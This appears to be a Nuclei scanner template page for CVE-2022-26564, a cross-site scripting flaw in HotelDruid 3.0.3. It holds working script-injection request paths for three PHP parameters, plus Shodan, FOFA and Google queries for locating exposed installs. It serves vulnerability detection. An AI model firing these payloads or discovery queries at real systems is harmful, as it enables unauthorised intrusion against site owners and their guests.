HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting
ID: CVE-2022-26564
Severity: medium
Author: alexrydzak
Tags: cve,cve2022,hoteldruid,xss,digitaldruid
Description
Section titled “Description”HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php.
YAML Source
Section titled “YAML Source”id: CVE-2022-26564
info: name: HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting author: alexrydzak severity: medium description: | HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php. impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: - https://rydzak.me/2022/04/cve-2022-26564/ - https://www.hoteldruid.com - https://nvd.nist.gov/vuln/detail/CVE-2022-26564 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-26564 cwe-id: CWE-79 epss-score: 0.00097 epss-percentile: 0.40567 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.3:*:*:*:*:*:*:* metadata: max-request: 3 vendor: digitaldruid product: hoteldruid shodan-query: - http.favicon.hash:-1521640213 - http.title:"hoteldruid" fofa-query: - title="hoteldruid" - icon_hash=-1521640213 google-query: intitle:"hoteldruid" tags: cve,cve2022,hoteldruid,xss,digitaldruid
http: - method: GET path: - '{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>' - '{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1' - '{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>'
stop-at-first-match: true
matchers-condition: and matchers: - type: word part: body words: - "<script>javascript:alert('XSS')</script>" - "HotelDruid" condition: and
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 4a0a0047304502203d44712017aa66ccb1b0c112f5991f57dadc8834f1ad3b81b156db9f4e9c0136022100c96ca7fbdcb1e73736b378d092de3839790617824d919f315fe190dbb8b43476:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-26564.yaml"